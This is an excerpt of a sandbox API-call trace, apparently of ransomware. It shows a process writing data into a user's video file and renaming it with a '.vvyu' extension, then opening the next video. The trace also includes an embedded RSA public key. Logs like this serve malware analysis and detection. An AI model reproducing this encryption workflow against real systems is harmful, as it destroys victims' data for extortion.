RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.422] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.423] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.423] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.423] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.423] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13c60) returned 0x2ea99b0 [0202.424] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1b10 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1b58 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.425] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3650 [0202.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.430] GetCurrentThreadId () returned 0x66c [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9318 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.431] GetCurrentThreadId () returned 0x66c [0202.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36c8 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36e0 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1b58 | out: hHeap=0x620000) returned 1 [0202.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.480] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x13c5a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x13c5a, lpOverlapped=0x0) returned 1 [0202.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.481] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x13c5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.481] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.483] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.484] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.484] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.484] CloseHandle (hObject=0x510) returned 1 [0202.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0202.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.490] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MHkDGP m.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mhkdgp m.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MHkDGP m.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mhkdgp m.avi.vvyu")) returned 1 [0202.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.493] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.497] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981178f0, ftCreationTime.dwHighDateTime=0x1d89bfe, ftLastAccessTime.dwLowDateTime=0x7ea31270, ftLastAccessTime.dwHighDateTime=0x1d8a52c, ftLastWriteTime.dwLowDateTime=0x7ea31270, ftLastWriteTime.dwHighDateTime=0x1d8a52c, nFileSizeHigh=0x0, nFileSizeLow=0x970e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpjP3oSTE.mkv", cAlternateFileName="MPJP3O~1.MKV")) returned 1 [0202.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91678 [0202.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.498] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MpjP3oSTE.mkv") returned=".mkv" [0202.498] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\MpjP3oSTE.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\mpjp3oste.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.499] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=38670) returned 1 [0202.499] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.506] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x96e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.507] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.513] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.513] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x970e, lpOverlapped=0x0) returned 1 [0202.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.515] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END 